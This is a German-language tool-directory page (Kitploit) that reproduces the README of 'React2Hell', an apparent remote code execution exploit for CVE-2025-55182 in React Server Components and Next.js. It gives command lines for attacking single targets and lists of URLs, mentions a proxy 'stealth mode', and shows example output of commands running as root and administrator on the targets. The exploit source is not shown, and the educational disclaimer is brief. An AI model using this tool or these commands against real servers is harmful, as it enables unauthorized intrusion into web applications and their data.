Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
React2Hell — [React2Hell] Next.js/React Server RCE Exploit — CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/aggressiveuser/react2hell
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubaggressiveuser/react2hell

React2Hell

[React2Hell] Next.js/React Server RCE Exploit — CVE-2025-55182

Repository anzeigen
3vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🧨 React2Hell — CVE-2025-55182 Exploit

🔥 Next.js / React Server Remote Code Execution (RCE) Exploit

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Autor: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 Übersicht

React2Hell ist ein leistungsstarkes Exploitation-Tool zum Testen und Ausnutzen von CVE-2025-55182, einer kritischen Remote Code Execution-Schwachstelle, die Next.js & React Server Actions betrifft.

Eine Pre-Authentication Remote Code Execution-Schwachstelle existiert in React Server Components Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0, einschließlich der folgenden Pakete: react-server-dom-parcel, react-server-dom-turbopack und react-server-dom-webpack. Der anfällige Code deserialisiert unsicher Payloads aus HTTP-Anfragen an Server Function-Endpunkte.


✨ Funktionen

  • 🧨 Remote Code Execution (RCE)
  • 🌐 Einzel-URL / Massen-URL-Scanning
  • 🧩 Benutzerdefinierte Befehlsausführung
  • 🕵️‍♂️ Stealth-Modus mit Proxy-Unterstützung
  • ⚡ Schnell, zuverlässig und einfach zu bedienen

📌 Verwendung

Einzelziel-Modus

root@kitploit:~
python exploit.py -u https://target.com -c "whoami"

Mehrere Ziele (aus Datei)

root@kitploit:~
python exploit.py -l urls.txt -c "whoami"

Mit HTTP-Proxy (Burp Suite)

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

Mit HTTPS-Proxy

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 urls.txt Beispiel

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ Beispielausgabe

root@kitploit:~
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://meow.host:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://evil.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://vul.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>

⚠️ Haftungsausschluss

Dieses Tool wurde ausschließlich zu Bildungs- und Sicherheitsforschungszwecken erstellt. Verwenden Sie es NICHT auf Systemen ohne ausdrückliche Genehmigung. Sie sind für Ihre eigenen Handlungen verantwortlich.


⭐ Unterstützen Sie das Projekt

Wenn dieser Exploit Ihnen geholfen hat, denken Sie bitte darüber nach, einen ⭐ auf GitHub zu hinterlassen ❤️


👤 Autor

Chetanya Sharma AggressiveUser

Erstellt mit 🔥 von jemandem, der gerne Dinge kaputt macht und repariert.


Tool herunterladen